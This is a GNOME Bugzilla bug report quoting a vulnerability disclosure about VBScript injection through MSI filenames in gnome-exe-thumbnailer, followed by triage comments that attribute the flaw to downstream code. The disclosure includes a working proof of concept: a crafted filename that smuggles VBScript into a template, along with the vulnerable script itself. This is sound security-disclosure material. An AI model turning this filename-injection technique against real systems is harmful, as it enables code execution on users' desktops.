After an evaluation, GNOME has moved from Bugzilla to GitLab. Learn more about GitLab.
No new issues can be reported in GNOME Bugzilla anymore.
To report an issue in a GNOME project, go to GNOME GitLab.
Do not go to GNOME Gitlab for: Bluefish, Doxygen, GnuCash, GStreamer, java-gnome, LDTP, NetworkManager, Tomboy.
Bug 785049 - VBScript Injection via MSI files via GNOME Thumbnailer
VBScript Injection via MSI files via GNOME Thumbnailer
Status: RESOLVED NOTGNOME
Product: gnome-desktop
Classification: Core
Component: Thumbnail
unspecified
Other Linux
: Normal normal
: ---
Assigned To: Desktop Maintainers
Desktop Maintainers
Depends on:
Blocks:
 
 
Reported: 2017-07-18 08:36 UTC by Tobias Mueller
Modified: 2017-07-20 04:45 UTC
See Also:
GNOME target: ---
GNOME version: ---



Description Tobias Mueller 2017-07-18 08:36:27 UTC
From http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html probably authored by Nils Dagsson Moskopp:



VBScript Injection via GNOME Thumbnailer
Summary
Vulnerability

Thumbnail generation for MSI files in GNOME Files executes arbitrary VBScript.
Remedy (for users)

Delete all files in /usr/share/thumbnailers. Do not use GNOME Files. Uninstall any other software that facilitates automatically executing parts of filenames as code.
Remedy (for developers)

Do not parse files with bug-ridden ad-hoc parsers. Fully recognize inputs before processing them. Do not use templates, use unparsers instead. Read about LANGSEC.
Marketing Materials

I name this vulnerability Bad Taste. Its logo is a color-shifted logo of Wine:
Proof of Concept
Install Dependencies

On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.

If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
Create MSI Files

Create a file named poc.xml with the following content:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>

Execute the following Bourne Shell code:

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
Details

Many file managers generate thumbnails depending on file formats. On GNU/Linux, to find a program that can generate a thumbnail for a particular file format, the file manager GNOME Files uses thumbnailer configuration files in /usr/share/thumbnailers. With the Debian package gnome-exe-thumbnailer installed, the file file /usr/share/thumbnailers/exe-dll-msi.thumbnailer contains the following text:

[Thumbnailer Entry]
TryExec=/usr/bin/gnome-exe-thumbnailer
Exec=/usr/bin/gnome-exe-thumbnailer %i %o %u
    MimeType=application/x-ms-dos-executable;application/x-msdownload;application/x-msi;application/x-ms-shortcut

This means that whenever an icon for a Microsoft Windows executable (EXE), installer (MSI), library (DLL), or shortcut (LNK) should be shown, GNOME Files calls /usr/bin/gnome-exe-thumbnailer to either extract an embedded icon from the file in question or deliver a fallback image for the appropriate filetype.

The shell script /usr/bin/gnome-exe-thumbnailer contains this code:

# Get the version number:
if [[ ${INPUTFILE##*.} = 'msi' ]]
then
	# Look for the ProductVersion property if user has the Microsoft (R) Windows Script Host installed:
	if which wine && grep -v 'Wine placeholder DLL' $HOME/.wine/drive_c/windows/system32/cscript.exe
	then
		# Workaround wine bug #19799: cscript crashes if you call WScript.Arguments(0)
		# http://bugs.winehq.org/show_bug.cgi?id=19799
		<<< "
			Dim WI, DB, View, Record
			Set WI = CreateObject(\"WindowsInstaller.Installer\")
Set DB = WI.OpenDatabase(\"$INPUTFILE\",0)
			Set View = DB.OpenView(\"SELECT Value FROM Property WHERE Property = 'ProductVersion'\")
			View.Execute
			Wscript.Echo View.Fetch.StringData(1)
		" iconv -f utf8 -t unicode > $TEMPFILE1.vbs

		VERSION=$(
			DISPLAY=NONE wine cscript.exe //E:vbs //NoLogo Z:\\tmp\\${TEMPFILE1##*/}.vbs 2>/dev/null \
			| egrep -o '^[0-9]+\.[0-9]+(\.[0-9][0-9]?)?(beta)?'
		)

	else
		# Try to get the version number from extended file properties at least:
		VERSION=$(
			file "$INPUTFILE" \
			| grep -o ', Subject: .*, Author: ' \
			| egrep -o '[0-9]+\.[0-9]+(\.[0-9][0-9]?)?(beta)?' \
			| head -1
		)
	fi

To summarize: Instead of parsing an MSI file to get its version number, this code creates a script containing the filename for which a thumbnail should be shown and executes that using Wine. The script is constructed using a template, which makes it possible to embed VBScript in a filename and trigger its execution.

Since only one line of VBScript is available, statements injected via the filename must be separated by colons. A single apostroph character (') can be used to start a comment that goes until the end of the line.
2017-07-17 14:47 – 2017-07-17 16:40
Comment 1 Tobias Mueller 2017-07-18 08:55:37 UTC
FTR: This is caused by downstream code which has already been fixed: https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5

The report may sound a bit as if GNOME code is exploited here, but that's not the case.

However, it makes sense to separate privileges for parsing (untrusted) data.
Comment 2 Carlos Soriano 2017-07-18 08:58:40 UTC
This is obviously not Nautilus, moving to gnome-desktop to implement proper privilege separation.
Comment 3 Bastien Nocera 2017-07-20 01:44:01 UTC
Thanks for taking the time to report this.
This particular bug has already been reported into our bug tracking system, but please feel free to report any further bugs you find.

*** This bug has been marked as a duplicate of bug 774497 ***